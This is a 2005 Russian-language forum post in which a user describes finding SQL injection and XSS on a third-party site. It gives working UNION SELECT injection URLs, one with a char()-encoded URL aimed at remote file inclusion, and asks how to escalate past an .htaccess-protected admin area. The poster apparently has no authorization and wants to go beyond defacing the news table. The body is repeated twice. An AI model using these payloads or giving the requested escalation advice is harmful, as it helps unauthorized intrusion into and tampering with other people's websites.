Skala
12.04.2005, 13:53
Нашел сайт, где есть уязвимость вида XSS и SQL-injection. Там такая картина: Если написать в адресе:
http://www.site.ru/in.php?part=dvn&det=null+union+SELECT+null,now(),now(),null,12,34, null,null/*
То выдается то, что ожидаю: заголовок статьи - "12", сама статья - 34. Но дальше возник вопрос: а мне-то что до этого? Я могу сделать insert в таблицу новостей, но хочется пойти дальше тупого варварства. Я написал такой адрес:
http://www.site.ru/in.php?part=dvn&det=null+union+SELECT+null,now(),now(),null,12,cha r(104,116,116,112,58,47,47,102,111,114,117,109,46, 97,110,116,105,99,104,97,116,46,114,117,47,110,101 ,119,116,104,114,101,97,100,46,112,104,112),null,n ull/*
Вместо ожидаемого инклюда постороннего файла, пишется его название. Как вы думаете, в каком направлении дальше рыть (админский сайт защищен .htaccess)?
http://www.site.ru/in.php?part=dvn&det=null+union+SELECT+null,now(),now(),null,12,34, null,null/*
То выдается то, что ожидаю: заголовок статьи - "12", сама статья - 34. Но дальше возник вопрос: а мне-то что до этого? Я могу сделать insert в таблицу новостей, но хочется пойти дальше тупого варварства. Я написал такой адрес:
http://www.site.ru/in.php?part=dvn&det=null+union+SELECT+null,now(),now(),null,12,cha r(104,116,116,112,58,47,47,102,111,114,117,109,46, 97,110,116,105,99,104,97,116,46,114,117,47,110,101 ,119,116,104,114,101,97,100,46,112,104,112),null,n ull/*
Вместо ожидаемого инклюда постороннего файла, пишется его название. Как вы думаете, в каком направлении дальше рыть (админский сайт защищен .htaccess)?